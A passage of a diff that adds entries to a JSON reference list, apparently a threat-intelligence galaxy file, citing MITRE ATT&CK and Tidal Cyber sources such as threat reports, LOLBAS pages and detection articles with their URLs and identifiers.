[ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/" + ], + "source": "MITRE", + "title": "Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop" + }, + "related": [], + "uuid": "ddd70eef-ab94-45a9-af43-c396c9e3fbc6", + "value": "Microsoft Deep Dive Solorigate January 2021" + }, + { + "description": "Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.", + "meta": { + "date_accessed": "2022-03-09T00:00:00Z", + "date_published": "2021-03-03T00:00:00Z", + "refs": [ + "https://o365blog.com/post/devices/" + ], + "source": "MITRE", + "title": "Deep-dive to Azure AD device join" + }, + "related": [], + "uuid": "978b408d-f9e9-422c-b2d7-741f6cc298d4", + "value": "AADInternals - Device Registration" + }, + { + "description": "Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-07-07T00:00:00Z", + "refs": [ + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Deep in Thought: Chinese Targeting of National Security Think Tanks" + }, + "related": [], + "uuid": "72e19be9-35dd-4199-bc07-bd9d0c664df6", + "value": "Alperovitch 2014" + }, + { + "description": "LOLBAS. (2020, October 1). DefaultPack.EXE. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/" + ], + "source": "Tidal Cyber", + "title": "DefaultPack.EXE" + }, + "related": [], + "uuid": "106efc3e-5816-44ae-a384-5e026e68ab89", + "value": "DefaultPack.EXE - LOLBAS Project" + }, + { + "description": "Arunpreet Singh, Clemens Kolbitsch. (2015, November 5). Defeating Darkhotel Just-In-Time Decryption. Retrieved April 15, 2021.", + "meta": { + "date_accessed": "2021-04-15T00:00:00Z", + "date_published": "2015-11-05T00:00:00Z", + "refs": [ + "https://www.lastline.com/labsblog/defeating-darkhotel-just-in-time-decryption/" + ], + "source": "MITRE", + "title": "Defeating Darkhotel Just-In-Time Decryption" + }, + "related": [], + "uuid": "e43341ae-178f-43ba-9d66-f4d0380d2c59", + "value": "Lastline DarkHotel Just In Time Decryption Nov 2015" + }, + { + "description": "Antonio Piazza (4n7m4n). (2021, November 23). Defeating Malicious Launch Persistence. Retrieved April 19, 2022.", + "meta": { + "date_accessed": "2022-04-19T00:00:00Z", + "date_published": "2021-11-23T00:00:00Z", + "refs": [ + "https://antman1p-30185.medium.com/defeating-malicious-launch-persistence-156e2b40fc67" + ], + "source": "MITRE", + "title": "Defeating Malicious Launch Persistence" + }, + "related": [], + "uuid": "8a3591f2-34b0-4914-bb42-d4621966faed", + "value": "piazza launch agent mitigation" + }, + { + "description": "vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2017-08-11T00:00:00Z", + "refs": [ + "https://twitter.com/vector_sec/status/896049052642533376" + ], + "source": "MITRE", + "title": "Defenders watching launches of cmd? What about forfiles?" + }, + "related": [], + "uuid": "8088d15d-9512-4d12-a99a-c76ad9dc3390", + "value": "VectorSec ForFiles Aug 2017" + }, + { + "description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.", + "meta": { + "date_accessed": "2017-06-22T00:00:00Z", + "date_published": "2015-11-01T00:00:00Z", + "refs": [ + "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf" + ], + "source": "MITRE", + "title": "Defending Against Malicious Application Compatibility Shims" + }, + "related": [], + "uuid": "19e3cddb-b077-40cf-92e0-131b12efa4f7", + "value": "Black Hat 2015 App Shim" + }, + { + "description": "Koeller, B.. (2018, February 21). Defending Against Rules and Forms Injection. Retrieved November 5, 2019.", + "meta": { + "date_accessed": "2019-11-05T00:00:00Z", + "date_published": "2018-02-21T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/" + ], + "source": "MITRE", + "title": "Defending Against Rules and Forms Injection" + }, + "related": [], + "uuid": "c7f9bd2f-254a-4254-8a92-a3ab02455fcb", + "value": "TechNet O365 Outlook Rules" + }, + { + "description": "Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.", + "meta": { + "date_accessed": "2022-07-05T00:00:00Z", + "date_published": "2022-06-20T00:00:00Z", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" + ], + "source": "MITRE", + "title": "Defending Against Scheduled Tasks" + }, + "related": [], + "uuid": "111d21df-5531-4927-a173-fac9cd7672b3", + "value": "Defending Against Scheduled Task Attacks in Windows Environments" + }, + { + "description": "Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022.", + "meta": { + "date_accessed": "2022-10-27T00:00:00Z", + "date_published": "2021-03-23T00:00:00Z", + "refs": [ + "https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/" + ], + "source": "MITRE", + "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange" + }, + "related": [], + "uuid": "cf05d229-c2ba-54f2-a79d-4b7c9185c663", + "value": "Rapid7 HAFNIUM Mar 2021" + }, + { + "description": "Microsoft Threat Intelligence. (2023, October 3). Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement. Retrieved October 3, 2023.", + "meta": { + "date_accessed": "2023-10-03T00:00:00Z", + "date_published": "2023-10-03T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/" + ], + "source": "MITRE", + "title": "Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement" + }, + "related": [], + "uuid": "a904fde8-b8f9-5411-ab46-0dacf39cc81f", + "value": "Microsoft SQL Server" + }, + { + "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.", + "meta": { + "date_accessed": "2022-04-08T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/" + ], + "source": "MITRE", + "title": "Defense Evasion Techniques" + }, + "related": [], + "uuid": "0f31f0ff-9ddb-4ea9-88d0-7b3b688764af", + "value": "rundll32.exe defense evasion" + }, + { + "description": "Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "date_published": "2021-04-22T00:00:00Z", + "refs": [ + "https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/" + ], + "source": "MITRE", + "title": "Defense Evasion: Windows Event Logging (T1562.002)" + }, + "related": [], + "uuid": "166e3a8a-047a-4798-b6cb-5aa36903a764", + "value": "def_ev_win_event_logging" + }, + { + "description": "Global Research & Analysis Team. (2022, October 3). DeftTorero: tactics, techniques and procedures of intrusions revealed. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "date_published": "2022-10-03T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/" + ], + "source": "Tidal Cyber", + "title": "DeftTorero: tactics, techniques and procedures of intrusions revealed" + }, + "related": [], + "uuid": "f6b43988-4d8b-455f-865e-3150e43d4f11", + "value": "Kaspersky DeftTorero October 3 2022" + }, + { + "description": "Microsoft. (n.d.). Del. Retrieved April 22, 2016.", + "meta": { + "date_accessed": "2016-04-22T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc771049.aspx" + ], + "source": "MITRE", + "title": "Del" + }, + "related": [], + "uuid": "01fc44b9-0eb3-4fd2-b755-d611825374ae", + "value": "TechNet Del" + }, + { + "description": "Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.", + "meta": { + "date_accessed": "2022-03-02T00:00:00Z", + "date_published": "2019-12-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature" + ], + "source": "MITRE", + "title": "Delegate access with a shared access signature" + }, + "related": [], + "uuid": "f6ffe1ef-13f3-4225-b714-cfb89aaaf3fa", + "value": "Azure Shared Access Signature" + }, + { + "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2017-09-26T00:00:00Z", + "refs": [ + "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/" + ], + "source": "MITRE", + "title": "Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'" + }, + "related": [], + "uuid": "e6b10687-8666-4c9c-ac77-1988378e096d", + "value": "Register Deloitte" + }, + { + "description": "Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2017-06-19T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/06/palestine-delphi.html" + ], + "source": "MITRE", + "title": "Delphi Used To Score Against Palestine" + }, + "related": [], + "uuid": "c727152c-079a-4ff9-a0e5-face919cf59b", + "value": "Talos Micropsia June 2017" + }, + { + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.", + "meta": { + "date_accessed": "2022-07-01T00:00:00Z", + "date_published": "2022-01-01T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + ], + "source": "MITRE", + "title": "Delving Deep: An Analysis of Earth Lusca’s Operations" + }, + "related": [], + "uuid": "f6e1bffd-e35b-4eae-b9bf-c16a82bf7004", + "value": "TrendMicro EarthLusca 2022" + }, + { + "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.", + "meta": { + "date_accessed": "2019-01-17T00:00:00Z", + "date_published": "2017-08-02T00:00:00Z", + "refs": [ + "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js" + ], + "source": "MITRE", + "title": "Demiguise: virginkey.js" + }, + "related": [], + "uuid": "2e55d33a-fe75-4397-b6f0-a28d397b4c24", + "value": "Demiguise Guardrail Router Logo" + }, + { + "description": "FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.", + "meta": { + "date_accessed": "2016-01-25T00:00:00Z", + "date_published": "2015-07-13T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html" + ], + "source": "MITRE", + "title": "Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak" + }, + "related": [], + "uuid": "c1e798b8-6771-4ba7-af25-69c640321e40", + "value": "FireEye Hacking Team" + }, + { + "description": "Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.", + "meta": { + "date_accessed": "2020-01-19T00:00:00Z", + "date_published": "2019-07-16T00:00:00Z", + "refs": [ + "https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/" + ], + "source": "MITRE", + "title": "Demystifying Azure AD Service Principals" + }, + "related": [], + "uuid": "3e285884-2191-4773-9243-74100ce177c8", + "value": "Demystifying Azure AD Service Principals" + }, + { + "description": "Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.", + "meta": { + "date_accessed": "2022-01-26T00:00:00Z", + "date_published": "2020-11-24T00:00:00Z", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947" + ], + "source": "MITRE", + "title": "Demystifying Ransomware Attacks Against Microsoft Defender Solution" + }, + "related": [], + "uuid": "3dc684c7-14de-4dc0-9f11-79160c4f5038", + "value": "demystifying_ryuk" + }, + { + "description": "DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.", + "meta": { + "date_accessed": "2020-12-10T00:00:00Z", + "date_published": "2020-09-17T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt" + ], + "source": "MITRE", + "title": "Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community" + }, + "related": [], + "uuid": "f30a77dd-d1d0-41b8-b82a-461dd6cd126f", + "value": "DOJ Iran Indictments September 2020" + }, + { + "description": "Microsoft. (2017, June 16). Deploy code integrity policies: steps. Retrieved June 28, 2017.", + "meta": { + "date_accessed": "2017-06-28T00:00:00Z", + "date_published": "2017-06-16T00:00:00Z", + "refs": [ + "https://github.com/Microsoft/windows-itpro-docs/blob/master/windows/device-security/device-guard/deploy-code-integrity-policies-steps.md" + ], + "source": "MITRE", + "title": "Deploy code integrity policies: steps" + }, + "related": [], + "uuid": "9646af1a-19fe-44c9-96ca-3c8ec097c3db", + "value": "Microsoft GitHub Device Guard CI Policies" + }, + { + "description": "Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs" + ], + "source": "MITRE", + "title": "Deploying Active Directory Federation Services in Azure" + }, + "related": [], + "uuid": "beeb460e-4dba-42fb-8109-0861cd0df562", + "value": "Microsoft Deploying AD Federation" + }, + { + "description": "Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.", + "meta": { + "date_accessed": "2020-11-04T00:00:00Z", + "refs": [ + "https://developer.apple.com/support/kernel-extensions/" + ], + "source": "MITRE", + "title": "Deprecated Kernel Extensions and System Extension Alternatives" + }, + "related": [], + "uuid": "86053c5a-f2dd-4eb3-9dc2-6a6a4e1c2ae5", + "value": "Apple Kernel Extension Deprecation" + }, + { + "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.", + "meta": { + "date_accessed": "2020-03-03T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html" + ], + "source": "MITRE", + "title": "describe-instance-information" + }, + "related": [], + "uuid": "c0b6a8a4-0d94-414d-b5ab-cf5485240dee", + "value": "Amazon Describe Instance" + }, + { + "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html" + ], + "source": "MITRE", + "title": "DescribeInstances" + }, + "related": [], + "uuid": "95629746-43d2-4f41-87da-4bd44a43ef4a", + "value": "Amazon Describe Instances API" + }, + { + "description": "Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022.", + "meta": { + "date_accessed": "2022-01-28T00:00:00Z", + "date_published": "2022-01-01T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html" + ], + "source": "MITRE", + "title": "DescribeSecurityGroups" + }, + "related": [], + "uuid": "aa953df5-40b5-42d2-9e33-a227a093497f", + "value": "DescribeSecurityGroups - Amazon Elastic Compute Cloud" + }, + { + "description": "Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.", + "meta": { + "date_accessed": "2018-06-29T00:00:00Z", + "date_published": "2018-08-20T00:00:00Z", + "refs": [ + "https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key" + ], + "source": "MITRE", + "title": "Description of the RunOnceEx Registry Key" + }, + "related": [], + "uuid": "f80bb86f-ce75-4778-bdee-777cf37a6de7", + "value": "Microsoft RunOnceEx APR 2018" + }, + { + "description": "Apple. (n.d.). Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html" + ], + "source": "MITRE", + "title": "Designing Daemons Apple Dev" + }, + "related": [], + "uuid": "4baac228-1f6a-4c65-ae98-5a542600dfc6", + "value": "Designing Daemons Apple Dev" + }, + { + "description": "LOLBAS. (2022, April 21). Desk.cpl. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-04-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/" + ], + "source": "Tidal Cyber", + "title": "Desk.cpl" + }, + "related": [], + "uuid": "487a54d9-9f90-478e-b305-bd041af55e12", + "value": "Desk.cpl - LOLBAS Project" + }, + { + "description": "Free Desktop. (2006, February 13). Desktop Application Autostart Specification. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "date_published": "2006-02-13T00:00:00Z", + "refs": [ + "https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html" + ], + "source": "MITRE", + "title": "Desktop Application Autostart Specification" + }, + "related": [], + "uuid": "0885434e-3908-4425-9597-ce6abe531ca5", + "value": "Free Desktop Application Autostart Feb 2006" + }, + { + "description": "LOLBAS. (2020, June 28). Desktopimgdownldr.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-06-28T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/" + ], + "source": "Tidal Cyber", + "title": "Desktopimgdownldr.exe" + }, + "related": [], + "uuid": "1df3aacf-76c4-472a-92c8-2a85ae9e2860", + "value": "Desktopimgdownldr.exe - LOLBAS Project" + }, + { + "description": "CISA. (2022, February 26). Destructive Malware Targeting Organizations in Ukraine. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-02-26T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a" + ], + "source": "MITRE", + "title": "Destructive Malware Targeting Organizations in Ukraine" + }, + "related": [], + "uuid": "18684085-c156-4610-8b1f-cc9646f2c06e", + "value": "CISA AA22-057A Destructive Malware February 2022" + }, + { + "description": "MSTIC. (2022, January 15). Destructive malware targeting Ukrainian organizations. Retrieved March 10, 2022.", + "meta": { + "date_accessed": "2022-03-10T00:00:00Z", + "date_published": "2022-01-15T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" + ], + "source": "MITRE", + "title": "Destructive malware targeting Ukrainian organizations" + }, + "related": [], + "uuid": "e0c1fcd3-b7a8-42af-8984-873a6f969975", + "value": "Microsoft WhisperGate January 2022" + }, + { + "description": "NSA and ASD. (2020, April 3). Detect and Prevent Web Shell Malware. Retrieved July 23, 2021.", + "meta": { + "date_accessed": "2021-07-23T00:00:00Z", + "date_published": "2020-04-03T00:00:00Z", + "refs": [ + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF" + ], + "source": "MITRE", + "title": "Detect and Prevent Web Shell Malware" + }, + "related": [], + "uuid": "e9a882a5-1a88-4fdf-9349-205f4fa167c9", + "value": "NSA and ASD Detect and Prevent Web Shells 2020" + }, + { + "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", + "meta": { + "date_accessed": "2019-02-04T00:00:00Z", + "date_published": "2018-04-22T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack" + ], + "source": "MITRE", + "title": "Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365" + }, + "related": [], + "uuid": "fd63775c-8482-477d-ab41-8c64ca17b602", + "value": "Microsoft Detect Outlook Forms" + }, + { + "description": "Lucand,G. (2018, February 18). Detect DCShadow, impossible?. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "date_published": "2018-02-18T00:00:00Z", + "refs": [ + "https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html" + ], + "source": "MITRE", + "title": "Detect DCShadow, impossible?" + }, + "related": [], + "uuid": "c1cd4767-b5a1-4821-8574-b5782a83920f", + "value": "ADDSecurity DCShadow Feb 2018" + }, + { + "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.", + "meta": { + "date_accessed": "2019-04-26T00:00:00Z", + "date_published": "2017-05-05T00:00:00Z", + "refs": [ + "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf" + ], + "source": "MITRE", + "title": "Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods" + }, + "related": [], + "uuid": "7a4e7e05-986b-4549-a021-8c3c729bd3cc", + "value": "Pace University Detecting DGA May 2017" + }, + { + "description": "MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "refs": [ + "https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/" + ], + "source": "MITRE", + "title": "Detecting and Advancing In-Memory .NET Tradecraft" + }, + "related": [], + "uuid": "a7952f0e-6690-48de-ad93-9922d6d6989c", + "value": "MDSec Detecting DOTNET" + }, + { + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "meta": { + "date_accessed": "2019-04-25T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + ], + "source": "MITRE", + "title": "Detecting and Analyzing Network Threats With NetFlow" + }, + "related": [], + "uuid": "ce447063-ec9a-4729-aaec-64ec123077ce", + "value": "Cisco DoSdetectNetflow" + }, + { + "description": "Adair, S. (2017, February 17). Detecting and Responding to Advanced Threats within Exchange Environments. Retrieved March 20, 2017.", + "meta": { + "date_accessed": "2017-03-20T00:00:00Z", + "date_published": "2017-02-17T00:00:00Z", + "refs": [ + "https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf" + ], + "source": "MITRE", + "title": "Detecting and Responding to Advanced Threats within Exchange Environments" + }, + "related": [], + "uuid": "005a276c-3369-4d29-bf0e-c7fa4e7d90bb", + "value": "RSA2017 Detect and Respond Adair" + }, + { + "description": "Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://nmap.org/book/firewalls.html" + ], + "source": "MITRE", + "title": "Detecting and Subverting Firewalls and Intrusion Detection Systems" + }, + "related": [], + "uuid": "c696ac8c-2c7a-4708-a369-0832a493e0a6", + "value": "Nmap Firewalls NIDS" + }, + { + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "meta": { + "date_accessed": "2019-10-11T00:00:00Z", + "date_published": "2018-10-02T00:00:00Z", + "refs": [ + "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + ], + "source": "MITRE", + "title": "Detecting Attempts to Steal Passwords from Memory" + }, + "related": [], + "uuid": "63955204-3cf9-4628-88d2-361de4dae94f", + "value": "Medium Detecting Attempts to Steal Passwords from Memory" + }, + { + "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.", + "meta": { + "date_accessed": "2018-08-06T00:00:00Z", + "date_published": "2018-07-07T00:00:00Z", + "refs": [ + "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/" + ], + "source": "MITRE", + "title": "Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon." + }, + "related": [], + "uuid": "d67901a4-8774-42d3-98de-c20158f88eb6", + "value": "Endurant CMSTP July 2018" + }, + { + "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2020-05-07T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/cor_profiler-for-persistence/" + ], + "source": "MITRE", + "title": "Detecting COR_PROFILER manipulation for persistence" + }, + "related": [], + "uuid": "3d8cb4d3-1cbe-416a-95b5-15003cbc2beb", + "value": "Red Canary COR_PROFILER May 2020" + }, + { + "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-10-11T00:00:00Z", + "refs": [ + "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" + ], + "source": "MITRE", + "title": "Detecting DDE in MS Office documents" + }, + "related": [], + "uuid": "75ccde9a-2d51-4492-9a8a-02fce30f9167", + "value": "NVisio Labs DDE Detection Oct 2017" + }, + { + "description": "Zhang, H., Papadopoulos, C., & Massey, D. (2013, April). Detecting encrypted botnet traffic. Retrieved August 19, 2015.", + "meta": { + "date_accessed": "2015-08-19T00:00:00Z", + "date_published": "2013-04-01T00:00:00Z", + "refs": [ + "http://www.netsec.colostate.edu/~zhang/DetectingEncryptedBotnetTraffic.pdf" + ], + "source": "MITRE", + "title": "Detecting encrypted botnet traffic" + }, + "related": [], + "uuid": "29edb7ad-3b3a-4fdb-9c4e-bb99fc2a1c67", + "value": "Zhang 2013" + }, + { + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "meta": { + "date_accessed": "2015-12-23T00:00:00Z", + "date_published": "2015-05-03T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=1515" + ], + "source": "MITRE", + "title": "Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory" + }, + "related": [], + "uuid": "4c328a1a-6a83-4399-86c5-d6e1586da8a3", + "value": "ADSecurity Detecting Forged Tickets" + }, + { + "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", + "meta": { + "date_accessed": "2018-03-23T00:00:00Z", + "date_published": "2018-02-23T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/" + ], + "source": "MITRE", + "title": "Detecting Kerberoasting activity using Azure Security Center" + }, + "related": [], + "uuid": "b36d82a8-82ca-4f22-85c0-ee82be3b6940", + "value": "Microsoft Detecting Kerberoasting Feb 2018" + }, + { + "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", + "meta": { + "date_accessed": "2019-10-11T00:00:00Z", + "date_published": "2018-09-30T00:00:00Z", + "refs": [ + "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc" + ], + "source": "MITRE", + "title": "Detecting Lateral Movement Using Sysmon and Splunk" + }, + "related": [], + "uuid": "91bea3c2-df54-424e-8667-035e6e15fe38", + "value": "Medium Detecting Lateral Movement" + }, + { + "description": "Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2017-11-30T00:00:00Z", + "refs": [ + "https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication" + ], + "source": "MITRE", + "title": "Detecting macOS High Sierra root account without authentication" + }, + "related": [], + "uuid": "4dc6ea85-a41b-4218-a9ae-e1eea841f2f2", + "value": "macOS root VNC login without authentication" + }, + { + "description": "Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2016-01-16T00:00:00Z", + "refs": [ + "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667" + ], + "source": "MITRE", + "title": "Detecting Malware and Sandbox Evasion Techniques" + }, + "related": [], + "uuid": "5d3d567c-dc25-44c1-8d2a-71ae00b60dbe", + "value": "Sans Virtual Jan 2016" + }, + { + "description": "Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.", + "meta": { + "date_accessed": 